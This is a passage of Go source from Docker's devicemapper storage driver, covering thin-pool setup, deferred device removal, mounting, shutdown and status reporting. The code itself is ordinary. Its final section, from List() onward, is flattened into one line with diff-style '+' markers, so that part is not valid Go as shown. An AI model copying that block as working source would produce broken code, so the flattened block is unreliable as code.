	var params, poolDataMajMin, poolMetadataMajMin string

	_, _, _, params, err := devicemapper.GetTable(devices.getPoolName())
	if err != nil {
		return 0, 0, 0, 0, err
	}

	// The thin-pool table line starts with "<metadata dev> <data dev>".
	if _, err = fmt.Sscanf(params, "%s %s", &poolMetadataMajMin, &poolDataMajMin); err != nil {
		return 0, 0, 0, 0, err
	}

	logrus.Debugf("devmapper: poolDataMajMin=%s poolMetaMajMin=%s\n", poolDataMajMin, poolMetadataMajMin)

	poolDataMajMinorSplit := strings.Split(poolDataMajMin, ":")
	poolDataMajor, err := strconv.ParseUint(poolDataMajMinorSplit[0], 10, 32)
	if err != nil {
		return 0, 0, 0, 0, err
	}

	poolDataMinor, err := strconv.ParseUint(poolDataMajMinorSplit[1], 10, 32)
	if err != nil {
		return 0, 0, 0, 0, err
	}

	poolMetadataMajMinorSplit := strings.Split(poolMetadataMajMin, ":")
	poolMetadataMajor, err := strconv.ParseUint(poolMetadataMajMinorSplit[0], 10, 32)
	if err != nil {
		return 0, 0, 0, 0, err
	}

	poolMetadataMinor, err := strconv.ParseUint(poolMetadataMajMinorSplit[1], 10, 32)
	if err != nil {
		return 0, 0, 0, 0, err
	}

	return poolDataMajor, poolDataMinor, poolMetadataMajor, poolMetadataMinor, nil
}

// loadThinPoolLoopBackInfo detects whether an existing pool is backed by
// our loopback files (data/metadata under loopbackDir) by comparing
// major:minor numbers, and records the loop devices if so.
func (devices *DeviceSet) loadThinPoolLoopBackInfo() error {
	poolDataMajor, poolDataMinor, poolMetadataMajor, poolMetadataMinor, err := devices.getThinPoolDataMetaMajMin()
	if err != nil {
		return err
	}

	dirname := devices.loopbackDir()

	// data device has not been passed in. So there should be a data file
	// which is being mounted as loop device.
	if devices.dataDevice == "" {
		datafilename := path.Join(dirname, "data")
		dataLoopDevice, dataMajor, dataMinor, err := getLoopFileDeviceMajMin(datafilename)
		if err != nil {
			return err
		}

		// Compare the two
		if poolDataMajor == dataMajor && poolDataMinor == dataMinor {
			devices.dataDevice = dataLoopDevice
			devices.dataLoopFile = datafilename
		}

	}

	// metadata device has not been passed in. So there should be a
	// metadata file which is being mounted as loop device.
	if devices.metadataDevice == "" {
		metadatafilename := path.Join(dirname, "metadata")
		metadataLoopDevice, metadataMajor, metadataMinor, err := getLoopFileDeviceMajMin(metadatafilename)
		if err != nil {
			return err
		}
		if poolMetadataMajor == metadataMajor && poolMetadataMinor == metadataMinor {
			devices.metadataDevice = metadataLoopDevice
			devices.metadataLoopFile = metadatafilename
		}
	}

	return nil
}

// enableDeferredRemovalDeletion turns on deferred removal/deletion if the
// user requested them, validating kernel and libdm support first.
func (devices *DeviceSet) enableDeferredRemovalDeletion() error {

	// If user asked for deferred removal then check both libdm library
	// and kernel driver support deferred removal otherwise error out.
	if enableDeferredRemoval {
		if !driverDeferredRemovalSupport {
			return fmt.Errorf("devmapper: Deferred removal can not be enabled as kernel does not support it")
		}
		if !devicemapper.LibraryDeferredRemovalSupport {
			return fmt.Errorf("devmapper: Deferred removal can not be enabled as libdm does not support it")
		}
		logrus.Debug("devmapper: Deferred removal support enabled.")
		devices.deferredRemove = true
	}

	if enableDeferredDeletion {
		if !devices.deferredRemove {
			return fmt.Errorf("devmapper: Deferred deletion can not be enabled as deferred removal is not enabled. Enable deferred removal using --storage-opt dm.use_deferred_removal=true parameter")
		}
		logrus.Debug("devmapper: Deferred deletion support enabled.")
		devices.deferredDelete = true
	}
	return nil
}

// initDevmapper is the main driver bring-up: probe driver capabilities,
// create or adopt the thin pool (loopback-backed if needed), load metadata
// and (when doInit) set up the base image.
func (devices *DeviceSet) initDevmapper(doInit bool) error {
	// give ourselves to libdm as a log handler
	devicemapper.LogInit(devices)

	version, err := devicemapper.GetDriverVersion()
	if err != nil {
		// Can't even get driver version, assume not supported
		return graphdriver.ErrNotSupported
	}

	if err := determineDriverCapabilities(version); err != nil {
		return graphdriver.ErrNotSupported
	}

	if err := devices.enableDeferredRemovalDeletion(); err != nil {
		return err
	}

	// https://github.com/docker/docker/issues/4036
	if supported := devicemapper.UdevSetSyncSupport(true); !supported {
		if dockerversion.IAmStatic == "true" {
			logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a dynamic binary to use devicemapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option")
		} else {
			logrus.Error("devmapper: Udev sync is not supported. This will lead to data loss and unexpected behavior. Install a more recent version of libdevmapper or select a different storage driver. For more information, see https://docs.docker.com/engine/reference/commandline/daemon/#daemon-storage-driver-option")
		}

		if !devices.overrideUdevSyncCheck {
			return graphdriver.ErrNotSupported
		}
	}

	//create the root dir of the devmapper driver ownership to match this
	//daemon's remapped root uid/gid so containers can start properly
	uid, gid, err := idtools.GetRootUIDGID(devices.uidMaps, devices.gidMaps)
	if err != nil {
		return err
	}
	if err := idtools.MkdirAs(devices.root, 0700, uid, gid); err != nil && !os.IsExist(err) {
		return err
	}
	if err := os.MkdirAll(devices.metadataDir(), 0700); err != nil && !os.IsExist(err) {
		return err
	}

	// Set the device prefix from the device id and inode of the docker root dir
	st, err := os.Stat(devices.root)
	if err != nil {
		return fmt.Errorf("devmapper: Error looking up dir %s: %s", devices.root, err)
	}
	sysSt := st.Sys().(*syscall.Stat_t)
	// "reg-" stands for "regular file".
	// In the future we might use "dev-" for "device file", etc.
	// docker-maj,min[-inode] stands for:
	//	- Managed by docker
	//	- The target of this device is at major <maj> and minor <min>
	//	- If <inode> is defined, use that file inside the device as a loopback image. Otherwise use the device itself.
	devices.devicePrefix = fmt.Sprintf("docker-%d:%d-%d", major(sysSt.Dev), minor(sysSt.Dev), sysSt.Ino)
	logrus.Debugf("devmapper: Generated prefix: %s", devices.devicePrefix)

	// Check for the existence of the thin-pool device
	poolExists, err := devices.thinPoolExists(devices.getPoolName())
	if err != nil {
		return err
	}

	// It seems libdevmapper opens this without O_CLOEXEC, and go exec will not close files
	// that are not Close-on-exec,
	// so we add this badhack to make sure it closes itself
	setCloseOnExec("/dev/mapper/control")

	// Make sure the sparse images exist in <root>/devicemapper/data and
	// <root>/devicemapper/metadata
	createdLoopback := false

	// If the pool doesn't exist, create it
	if !poolExists && devices.thinPoolDevice == "" {
		logrus.Debug("devmapper: Pool doesn't exist. Creating it.")

		var (
			dataFile     *os.File
			metadataFile *os.File
		)

		if devices.dataDevice == "" {
			// Make sure the sparse images exist in <root>/devicemapper/data

			hasData := devices.hasImage("data")

			if !doInit && !hasData {
				return errors.New("loopback data file not found")
			}

			if !hasData {
				createdLoopback = true
			}

			data, err := devices.ensureImage("data", devices.dataLoopbackSize)
			if err != nil {
				logrus.Debugf("devmapper: Error device ensureImage (data): %s", err)
				return err
			}

			dataFile, err = loopback.AttachLoopDevice(data)
			if err != nil {
				return err
			}
			devices.dataLoopFile = data
			devices.dataDevice = dataFile.Name()
		} else {
			dataFile, err = os.OpenFile(devices.dataDevice, os.O_RDWR, 0600)
			if err != nil {
				return err
			}
		}
		defer dataFile.Close()

		if devices.metadataDevice == "" {
			// Make sure the sparse images exist in <root>/devicemapper/metadata

			hasMetadata := devices.hasImage("metadata")

			if !doInit && !hasMetadata {
				return errors.New("loopback metadata file not found")
			}

			if !hasMetadata {
				createdLoopback = true
			}

			metadata, err := devices.ensureImage("metadata", devices.metaDataLoopbackSize)
			if err != nil {
				logrus.Debugf("devmapper: Error device ensureImage (metadata): %s", err)
				return err
			}

			metadataFile, err = loopback.AttachLoopDevice(metadata)
			if err != nil {
				return err
			}
			devices.metadataLoopFile = metadata
			devices.metadataDevice = metadataFile.Name()
		} else {
			metadataFile, err = os.OpenFile(devices.metadataDevice, os.O_RDWR, 0600)
			if err != nil {
				return err
			}
		}
		defer metadataFile.Close()

		if err := devicemapper.CreatePool(devices.getPoolName(), dataFile, metadataFile, devices.thinpBlockSize); err != nil {
			return err
		}
	}

	// Pool already exists and caller did not pass us a pool. That means
	// we probably created pool earlier and could not remove it as some
	// containers were still using it. Detect some of the properties of
	// pool, like is it using loop devices.
	if poolExists && devices.thinPoolDevice == "" {
		if err := devices.loadThinPoolLoopBackInfo(); err != nil {
			logrus.Debugf("devmapper: Failed to load thin pool loopback device information:%v", err)
			return err
		}
	}

	// If we didn't just create the data or metadata image, we need to
	// load the transaction id and migrate old metadata
	if !createdLoopback {
		if err := devices.initMetaData(); err != nil {
			return err
		}
	}

	if devices.thinPoolDevice == "" {
		if devices.metadataLoopFile != "" || devices.dataLoopFile != "" {
			logrus.Warn("devmapper: Usage of loopback devices is strongly discouraged for production use. Please use `--storage-opt dm.thinpooldev` or use `man docker` to refer to dm.thinpooldev section.")
		}
	}

	// Right now this loads only NextDeviceID. If there is more metadata
	// down the line, we might have to move it earlier.
	if err := devices.loadDeviceSetMetaData(); err != nil {
		return err
	}

	// Setup the base image
	if doInit {
		if err := devices.setupBaseImage(); err != nil {
			logrus.Debugf("devmapper: Error device setupBaseImage: %s", err)
			return err
		}
	}

	return nil
}

// AddDevice adds a device and registers in the hash.
func (devices *DeviceSet) AddDevice(hash, baseHash string, storageOpt map[string]string) error {
	logrus.Debugf("devmapper: AddDevice START(hash=%s basehash=%s)", hash, baseHash)
	defer logrus.Debugf("devmapper: AddDevice END(hash=%s basehash=%s)", hash, baseHash)

	// If a deleted device exists, return error.
	baseInfo, err := devices.lookupDeviceWithLock(baseHash)
	if err != nil {
		return err
	}

	if baseInfo.Deleted {
		return fmt.Errorf("devmapper: Base device %v has been marked for deferred deletion", baseInfo.Hash)
	}

	baseInfo.lock.Lock()
	defer baseInfo.lock.Unlock()

	devices.Lock()
	defer devices.Unlock()

	// Also include deleted devices in case hash of new device is
	// same as one of the deleted devices.
	if info, _ := devices.lookupDevice(hash); info != nil {
		return fmt.Errorf("devmapper: device %s already exists. Deleted=%v", hash, info.Deleted)
	}

	size, err := devices.parseStorageOpt(storageOpt)
	if err != nil {
		return err
	}

	if size == 0 {
		size = baseInfo.Size
	}

	if size < baseInfo.Size {
		return fmt.Errorf("devmapper: Container size cannot be smaller than %s", units.HumanSize(float64(baseInfo.Size)))
	}

	if err := devices.takeSnapshot(hash, baseInfo, size); err != nil {
		return err
	}

	// Grow the container rootfs.
	if size > baseInfo.Size {
		info, err := devices.lookupDevice(hash)
		if err != nil {
			return err
		}

		if err := devices.growFS(info); err != nil {
			return err
		}
	}

	return nil
}

// parseStorageOpt extracts the per-container "size" option (in bytes);
// returns 0 when no size option is present.
func (devices *DeviceSet) parseStorageOpt(storageOpt map[string]string) (uint64, error) {

	// Read size to change the block device size per container.
	for key, val := range storageOpt {
		key := strings.ToLower(key)
		switch key {
		case "size":
			size, err := units.RAMInBytes(val)
			if err != nil {
				return 0, err
			}
			return uint64(size), nil
		default:
			return 0, fmt.Errorf("Unknown option %s", key)
		}
	}

	return 0, nil
}

// markForDeferredDeletion flags info as Deleted on disk and bumps the
// deleted-device counter; a metadata save failure rolls the flag back.
func (devices *DeviceSet) markForDeferredDeletion(info *devInfo) error {
	// If device is already in deleted state, there is nothing to be done.
	if info.Deleted {
		return nil
	}

	logrus.Debugf("devmapper: Marking device %s for deferred deletion.", info.Hash)

	info.Deleted = true

	// save device metadata to reflect deleted state.
	if err := devices.saveMetadata(info); err != nil {
		info.Deleted = false
		return err
	}

	devices.nrDeletedDevices++
	return nil
}

// Should be called with devices.Lock() held.
func (devices *DeviceSet) deleteTransaction(info *devInfo, syncDelete bool) error {
	// NOTE(review): the hash placeholder in this log line is a hard-coded
	// "" rather than info.Hash — presumably an oversight; confirm.
	if err := devices.openTransaction(info.Hash, info.DeviceID); err != nil {
		logrus.Debugf("devmapper: Error opening transaction hash = %s deviceId = %d", "", info.DeviceID)
		return err
	}

	defer devices.closeTransaction()

	err := devicemapper.DeleteDevice(devices.getPoolDevName(), info.DeviceID)
	if err != nil {
		// If syncDelete is true, we want to return error. If deferred
		// deletion is not enabled, we return an error. If error is
		// something other then EBUSY, return an error.
		if syncDelete || !devices.deferredDelete || err != devicemapper.ErrBusy {
			logrus.Debugf("devmapper: Error deleting device: %s", err)
			return err
		}
	}

	if err == nil {
		if err := devices.unregisterDevice(info.DeviceID, info.Hash); err != nil {
			return err
		}
		// If device was already in deferred delete state that means
		// deletion was being tried again later. Reduce the deleted
		// device count.
		if info.Deleted {
			devices.nrDeletedDevices--
		}
		devices.markDeviceIDFree(info.DeviceID)
	} else {
		if err := devices.markForDeferredDeletion(info); err != nil {
			return err
		}
	}

	return nil
}

// Issue discard only if device open count is zero.
func (devices *DeviceSet) issueDiscard(info *devInfo) error {
	logrus.Debugf("devmapper: issueDiscard START(device: %s).", info.Hash)
	defer logrus.Debugf("devmapper: issueDiscard END(device: %s).", info.Hash)
	// This is a workaround for the kernel not discarding block so
	// on the thin pool when we remove a thinp device, so we do it
	// manually.
	// Even if device is deferred deleted, activate it and issue
	// discards.
	if err := devices.activateDeviceIfNeeded(info, true); err != nil {
		return err
	}

	devinfo, err := devicemapper.GetInfo(info.Name())
	if err != nil {
		return err
	}

	if devinfo.OpenCount != 0 {
		logrus.Debugf("devmapper: Device: %s is in use. OpenCount=%d. Not issuing discards.", info.Hash, devinfo.OpenCount)
		return nil
	}

	if err := devicemapper.BlockDeviceDiscard(info.DevName()); err != nil {
		logrus.Debugf("devmapper: Error discarding block on device: %s (ignoring)", err)
	}
	return nil
}

// Should be called with devices.Lock() held.
func (devices *DeviceSet) deleteDevice(info *devInfo, syncDelete bool) error {
	if devices.doBlkDiscard {
		devices.issueDiscard(info)
	}

	// Try to deactivate device in case it is active.
	if err := devices.deactivateDevice(info); err != nil {
		logrus.Debugf("devmapper: Error deactivating device: %s", err)
		return err
	}

	if err := devices.deleteTransaction(info, syncDelete); err != nil {
		return err
	}

	return nil
}

// DeleteDevice will return success if device has been marked for deferred
// removal. If one wants to override that and want DeleteDevice() to fail if
// device was busy and could not be deleted, set syncDelete=true.
func (devices *DeviceSet) DeleteDevice(hash string, syncDelete bool) error {
	logrus.Debugf("devmapper: DeleteDevice START(hash=%v syncDelete=%v)", hash, syncDelete)
	defer logrus.Debugf("devmapper: DeleteDevice END(hash=%v syncDelete=%v)", hash, syncDelete)
	info, err := devices.lookupDeviceWithLock(hash)
	if err != nil {
		return err
	}

	// Lock ordering: per-device lock first, then the set lock —
	// consistent with the other mutating paths in this file.
	info.lock.Lock()
	defer info.lock.Unlock()

	devices.Lock()
	defer devices.Unlock()

	return devices.deleteDevice(info, syncDelete)
}

// deactivatePool removes the thin-pool dm device if it exists, then warns
// (without failing) if the pool still has active dependents.
func (devices *DeviceSet) deactivatePool() error {
	logrus.Debug("devmapper: deactivatePool() START")
	defer logrus.Debug("devmapper: deactivatePool() END")
	devname := devices.getPoolDevName()

	devinfo, err := devicemapper.GetInfo(devname)
	if err != nil {
		return err
	}

	// Pool device not present — nothing to deactivate.
	if devinfo.Exists == 0 {
		return nil
	}
	if err := devicemapper.RemoveDevice(devname); err != nil {
		return err
	}

	if d, err := devicemapper.GetDeps(devname); err == nil {
		logrus.Warnf("devmapper: device %s still has %d active dependents", devname, d.Count)
	}

	return nil
}

// deactivateDevice removes the dm device for info, using deferred removal
// when enabled, otherwise a bounded synchronous retry (removeDevice).
func (devices *DeviceSet) deactivateDevice(info *devInfo) error {
	logrus.Debugf("devmapper: deactivateDevice START(%s)", info.Hash)
	defer logrus.Debugf("devmapper: deactivateDevice END(%s)", info.Hash)

	devinfo, err := devicemapper.GetInfo(info.Name())
	if err != nil {
		return err
	}

	// Already gone — nothing to do.
	if devinfo.Exists == 0 {
		return nil
	}

	if devices.deferredRemove {
		if err := devicemapper.RemoveDeviceDeferred(info.Name()); err != nil {
			return err
		}
	} else {
		if err := devices.removeDevice(info.Name()); err != nil {
			return err
		}
	}
	return nil
}

// Issues the underlying dm remove operation.
func (devices *DeviceSet) removeDevice(devname string) error {
	var err error

	logrus.Debugf("devmapper: removeDevice START(%s)", devname)
	defer logrus.Debugf("devmapper: removeDevice END(%s)", devname)

	// Retry up to 200 times (~20s total) while the device reports EBUSY.
	// The set lock is dropped during each sleep so other work can proceed;
	// callers must therefore hold devices.Lock() when calling this.
	for i := 0; i < 200; i++ {
		err = devicemapper.RemoveDevice(devname)
		if err == nil {
			break
		}
		if err != devicemapper.ErrBusy {
			return err
		}

		// If we see EBUSY it may be a transient error,
		// sleep a bit a retry a few times.
		devices.Unlock()
		time.Sleep(100 * time.Millisecond)
		devices.Lock()
	}

	return err
}

// cancelDeferredRemovalIfNeeded cancels a pending deferred removal for
// info's device, if one is scheduled. ErrEnxio (device already gone) is
// tolerated.
func (devices *DeviceSet) cancelDeferredRemovalIfNeeded(info *devInfo) error {
	if !devices.deferredRemove {
		return nil
	}

	logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded START(%s)", info.Name())
	defer logrus.Debugf("devmapper: cancelDeferredRemovalIfNeeded END(%s)", info.Name())

	devinfo, err := devicemapper.GetInfoWithDeferred(info.Name())
	if err != nil {
		return err
	}

	// No deferred removal pending — nothing to cancel.
	if devinfo != nil && devinfo.DeferredRemove == 0 {
		return nil
	}

	// Cancel deferred remove
	if err := devices.cancelDeferredRemoval(info); err != nil {
		// If Error is ErrEnxio. Device is probably already gone. Continue.
		if err != devicemapper.ErrEnxio {
			return err
		}
	}
	return nil
}

// cancelDeferredRemoval issues the cancel, retrying up to 100 times on
// EBUSY with the set lock released during each sleep.
func (devices *DeviceSet) cancelDeferredRemoval(info *devInfo) error {
	logrus.Debugf("devmapper: cancelDeferredRemoval START(%s)", info.Name())
	defer logrus.Debugf("devmapper: cancelDeferredRemoval END(%s)", info.Name())

	var err error

	// Cancel deferred remove
	for i := 0; i < 100; i++ {
		err = devicemapper.CancelDeferredRemove(info.Name())
		if err != nil {
			if err == devicemapper.ErrBusy {
				// If we see EBUSY it may be a transient error,
				// sleep a bit a retry a few times.
				devices.Unlock()
				time.Sleep(100 * time.Millisecond)
				devices.Lock()
				continue
			}
		}
		break
	}
	return err
}

// Shutdown shuts down the device by unmounting the root.
func (devices *DeviceSet) Shutdown(home string) error {
	logrus.Debugf("devmapper: [deviceset %s] Shutdown()", devices.devicePrefix)
	logrus.Debugf("devmapper: Shutting down DeviceSet: %s", devices.root)
	defer logrus.Debugf("devmapper: [deviceset %s] Shutdown() END", devices.devicePrefix)

	// Stop deletion worker. This should start delivering new events to
	// ticker channel. That means no new instance of cleanupDeletedDevice()
	// will run after this call. If one instance is already running at
	// the time of the call, it must be holding devices.Lock() and
	// we will block on this lock till cleanup function exits.
	devices.deletionWorkerTicker.Stop()

	devices.Lock()
	// Save DeviceSet Metadata first. Docker kills all threads if they
	// don't finish in certain time. It is possible that Shutdown()
	// routine does not finish in time as we loop trying to deactivate
	// some devices while these are busy. In that case shutdown() routine
	// will be killed and we will not get a chance to save deviceset
	// metadata. Hence save this early before trying to deactivate devices.
	devices.saveDeviceSetMetaData()

	// ignore the error since it's just a best effort to not try to unmount something that's mounted
	mounts, _ := mount.GetMounts()
	mounted := make(map[string]bool, len(mounts))
	for _, mnt := range mounts {
		mounted[mnt.Mountpoint] = true
	}

	// Walk every per-container mount dir under <home>/mnt: lazily unmount
	// anything still mounted, then deactivate its dm device.
	if err := filepath.Walk(path.Join(home, "mnt"), func(p string, info os.FileInfo, err error) error {
		if err != nil {
			return err
		}
		if !info.IsDir() {
			return nil
		}

		if mounted[p] {
			// We use MNT_DETACH here in case it is still busy in some running
			// container. This means it'll go away from the global scope directly,
			// and the device will be released when that container dies.
			if err := syscall.Unmount(p, syscall.MNT_DETACH); err != nil {
				logrus.Debugf("devmapper: Shutdown unmounting %s, error: %s", p, err)
			}
		}

		if devInfo, err := devices.lookupDevice(path.Base(p)); err != nil {
			logrus.Debugf("devmapper: Shutdown lookup device %s, error: %s", path.Base(p), err)
		} else {
			if err := devices.deactivateDevice(devInfo); err != nil {
				logrus.Debugf("devmapper: Shutdown deactivate %s , error: %s", devInfo.Hash, err)
			}
		}

		return nil
	}); err != nil && !os.IsNotExist(err) {
		devices.Unlock()
		return err
	}

	devices.Unlock()

	// Deactivate the base image device ("" hash), then the pool itself
	// (only if we own it, i.e. no external thin pool was supplied).
	info, _ := devices.lookupDeviceWithLock("")
	if info != nil {
		info.lock.Lock()
		devices.Lock()
		if err := devices.deactivateDevice(info); err != nil {
			logrus.Debugf("devmapper: Shutdown deactivate base , error: %s", err)
		}
		devices.Unlock()
		info.lock.Unlock()
	}

	devices.Lock()
	if devices.thinPoolDevice == "" {
		if err := devices.deactivatePool(); err != nil {
			logrus.Debugf("devmapper: Shutdown deactivate pool , error: %s", err)
		}
	}
	devices.Unlock()

	return nil
}

// Recent XFS changes allow changing behavior of filesystem in case of errors.
// When thin pool gets full and XFS gets ENOSPC error, currently it tries
// IO infinitely and sometimes it can block the container process
// and the process can't be killed. With a max_retries value of 0, XFS will
// not retry upon error and instead will shutdown the filesystem.

// xfsSetNospaceRetries writes the user-configured dm.xfs_nospace_max_retries
// value into /sys/fs/xfs/<dm-name>/error/metadata/ENOSPC/max_retries for the
// device's dm node.
func (devices *DeviceSet) xfsSetNospaceRetries(info *devInfo) error {
	// info.DevName() is a symlink; resolve it to the underlying dm-N name
	// used in the sysfs path below.
	dmDevicePath, err := os.Readlink(info.DevName())
	if err != nil {
		return fmt.Errorf("devmapper: readlink failed for device %v:%v", info.DevName(), err)
	}

	dmDeviceName := path.Base(dmDevicePath)
	filePath := "/sys/fs/xfs/" + dmDeviceName + "/error/metadata/ENOSPC/max_retries"
	maxRetriesFile, err := os.OpenFile(filePath, os.O_WRONLY, 0)
	if err != nil {
		return fmt.Errorf("devmapper: user specified daemon option dm.xfs_nospace_max_retries but it does not seem to be supported on this system :%v", err)
	}
	defer maxRetriesFile.Close()

	// Write the configured retry count (the string value of
	// dm.xfs_nospace_max_retries).
	_, err = maxRetriesFile.WriteString(devices.xfsNospaceRetries)
	if err != nil {
		return fmt.Errorf("devmapper: Failed to write string %v to file %v:%v", devices.xfsNospaceRetries, filePath, err)
	}
	return nil
}

// MountDevice mounts the device if not already mounted.
// NOTE(review): the `path` parameter shadows the imported "path" package
// within this function body.
func (devices *DeviceSet) MountDevice(hash, path, mountLabel string) error {
	info, err := devices.lookupDeviceWithLock(hash)
	if err != nil {
		return err
	}

	if info.Deleted {
		return fmt.Errorf("devmapper: Can't mount device %v as it has been marked for deferred deletion", info.Hash)
	}

	// Lock ordering: per-device lock first, then the DeviceSet lock.
	info.lock.Lock()
	defer info.lock.Unlock()

	devices.Lock()
	defer devices.Unlock()

	if err := devices.activateDeviceIfNeeded(info, false); err != nil {
		return fmt.Errorf("devmapper: Error activating devmapper device for '%s': %s", hash, err)
	}

	fstype, err := ProbeFsType(info.DevName())
	if err != nil {
		return err
	}

	options := ""

	if fstype == "xfs" {
		// XFS needs nouuid or it can't mount filesystems with the same fs
		options = joinMountOptions(options, "nouuid")
	}

	options = joinMountOptions(options, devices.mountOptions)
	options = joinMountOptions(options, label.FormatMountLabel("", mountLabel))

	if err := mount.Mount(info.DevName(), path, fstype, options); err != nil {
		return fmt.Errorf("devmapper: Error mounting '%s' on '%s': %s", info.DevName(), path, err)
	}

	if fstype == "xfs" && devices.xfsNospaceRetries != "" {
		// If the retry knob can't be set, undo the mount and deactivate so
		// we don't leave a half-configured device mounted.
		if err := devices.xfsSetNospaceRetries(info); err != nil {
			syscall.Unmount(path, syscall.MNT_DETACH)
			devices.deactivateDevice(info)
			return err
		}
	}

	return nil
}

// UnmountDevice unmounts the device and removes it from hash.
func (devices *DeviceSet) UnmountDevice(hash, mountPath string) error {
	logrus.Debugf("devmapper: UnmountDevice START(hash=%s)", hash)
	defer logrus.Debugf("devmapper: UnmountDevice END(hash=%s)", hash)

	info, err := devices.lookupDeviceWithLock(hash)
	if err != nil {
		return err
	}

	// Same lock ordering as MountDevice: device lock, then DeviceSet lock.
	info.lock.Lock()
	defer info.lock.Unlock()

	devices.Lock()
	defer devices.Unlock()

	logrus.Debugf("devmapper: Unmount(%s)", mountPath)
	// MNT_DETACH: lazy unmount, so a busy mount point does not fail here.
	if err := syscall.Unmount(mountPath, syscall.MNT_DETACH); err != nil {
		return err
	}
	logrus.Debug("devmapper: Unmount done")

	if err := devices.deactivateDevice(info); err != nil {
		return err
	}

	return nil
}

// HasDevice returns true if the device metadata exists.
func (devices *DeviceSet) HasDevice(hash string) bool {
	info, _ := devices.lookupDeviceWithLock(hash)
	return info != nil
}

// List returns a list of device ids.
+func (devices *DeviceSet) List() []string { + devices.Lock() + defer devices.Unlock() + + ids := make([]string, len(devices.Devices)) + i := 0 + for k := range devices.Devices { + ids[i] = k + i++ + } + return ids +} + +func (devices *DeviceSet) deviceStatus(devName string) (sizeInSectors, mappedSectors, highestMappedSector uint64, err error) { + var params string + _, sizeInSectors, _, params, err = devicemapper.GetStatus(devName) + if err != nil { + return + } + if _, err = fmt.Sscanf(params, "%d %d", &mappedSectors, &highestMappedSector); err == nil { + return + } + return +} + +// GetDeviceStatus provides size, mapped sectors +func (devices *DeviceSet) GetDeviceStatus(hash string) (*DevStatus, error) { + info, err := devices.lookupDeviceWithLock(hash) + if err != nil { + return nil, err + } + + info.lock.Lock() + defer info.lock.Unlock() + + devices.Lock() + defer devices.Unlock() + + status := &DevStatus{ + DeviceID: info.DeviceID, + Size: info.Size, + TransactionID: info.TransactionID, + } + + if err := devices.activateDeviceIfNeeded(info, false); err != nil { + return nil, fmt.Errorf("devmapper: Error activating devmapper device for '%s': %s", hash, err) + } + + sizeInSectors, mappedSectors, highestMappedSector, err := devices.deviceStatus(info.DevName()) + + if err != nil { + return nil, err + } + + status.SizeInSectors = sizeInSectors + status.MappedSectors = mappedSectors + status.HighestMappedSector = highestMappedSector + + return status, nil +} + +func (devices *DeviceSet) poolStatus() (totalSizeInSectors, transactionID, dataUsed, dataTotal, metadataUsed, metadataTotal uint64, err error) { + var params string + if _, totalSizeInSectors, _, params, err = devicemapper.GetStatus(devices.getPoolName()); err == nil { + _, err = fmt.Sscanf(params, "%d %d/%d %d/%d", &transactionID, &metadataUsed, &metadataTotal, &dataUsed, &dataTotal) + } + return +} + +// DataDevicePath returns the path to the data storage for this deviceset, +// regardless of loopback or 
block device +func (devices *DeviceSet) DataDevicePath() string { + return devices.dataDevice +} + +// MetadataDevicePath returns the path to the metadata storage for this deviceset, +// regardless of loopback or block device +func (devices *DeviceSet) MetadataDevicePath() string { + return devices.metadataDevice +} + +func (devices *DeviceSet) getUnderlyingAvailableSpace(loopFile string) (uint64, error) { + buf := new(syscall.Statfs_t) + if err := syscall.Statfs(loopFile, buf); err != nil { + logrus.Warnf("devmapper: Couldn't stat loopfile filesystem %v: %v", loopFile, err) + return 0, err + } + return buf.Bfree * uint64(buf.Bsize), nil +} + +func (devices *DeviceSet) isRealFile(loopFile string) (bool, error) { + if loopFile != "" { + fi, err := os.Stat(loopFile) + if err != nil { + logrus.Warnf("devmapper: Couldn't stat loopfile %v: %v", loopFile, err) + return false, err + } + return fi.Mode().IsRegular(), nil + } + return false, nil +} + +// Status returns the current status of this deviceset +func (devices *DeviceSet) Status() *Status { + devices.Lock() + defer devices.Unlock() + + status := &Status{} + + status.PoolName = devices.getPoolName() + status.DataFile = devices.DataDevicePath() + status.DataLoopback = devices.dataLoopFile + status.MetadataFile = devices.MetadataDevicePath() + status.MetadataLoopback = devices.metadataLoopFile + status.UdevSyncSupported = devicemapper.UdevSyncSupported() + status.DeferredRemoveEnabled = devices.deferredRemove + status.DeferredDeleteEnabled = devices.deferredDelete + status.DeferredDeletedDeviceCount = devices.nrDeletedDevices + status.BaseDeviceSize = devices.getBaseDeviceSize() + status.BaseDeviceFS = devices.getBaseDeviceFS() + + totalSizeInSectors, _, dataUsed, dataTotal, metadataUsed, metadataTotal, err := devices.poolStatus() + if err == nil { + // Convert from blocks to bytes + blockSizeInSectors := totalSizeInSectors / dataTotal + + status.Data.Used = dataUsed * blockSizeInSectors * 512 + status.Data.Total = 
dataTotal * blockSizeInSectors * 512 + status.Data.Available = status.Data.Total - status.Data.Used + + // metadata blocks are always 4k + status.Metadata.Used = metadataUsed * 4096 + status.Metadata.Total = metadataTotal * 4096 + status.Metadata.Available = status.Metadata.Total - status.Metadata.Used + + status.SectorSize = blockSizeInSectors * 512 + + if check, _ := devices.isRealFile(devices.dataLoopFile); check { + actualSpace, err := devices.getUnderlyingAvailableSpace(devices.dataLoopFile) + if err == nil && actualSpace < status.Data.Available { + status.Data.Available = actualSpace + } + } + + if check, _ := devices.isRealFile(devices.metadataLoopFile); check { + actualSpace, err := devices.getUnderlyingAvailableSpace(devices.metadataLoopFile) + if err == nil && actualSpace < status.Metadata.Available { + status.Metadata.Available = actualSpace + } + } + + minFreeData := (dataTotal * uint64(devices.minFreeSpacePercent)) / 100 + status.MinFreeSpace = minFreeData * blockSizeInSectors * 512 + } + + return status +} + +// Status returns the current status of this deviceset +func (devices *DeviceSet) exportDeviceMetadata(hash string) (*deviceMetadata, error) { + info, err := devices.lookupDeviceWithLock(hash) + if err != nil { + return nil, err + } + + info.lock.Lock() + defer info.lock.Unlock() + + metadata := &deviceMetadata{info.DeviceID, info.Size, info.Name()} + return metadata, nil +} + +// NewDeviceSet creates the device set based on the options provided. 
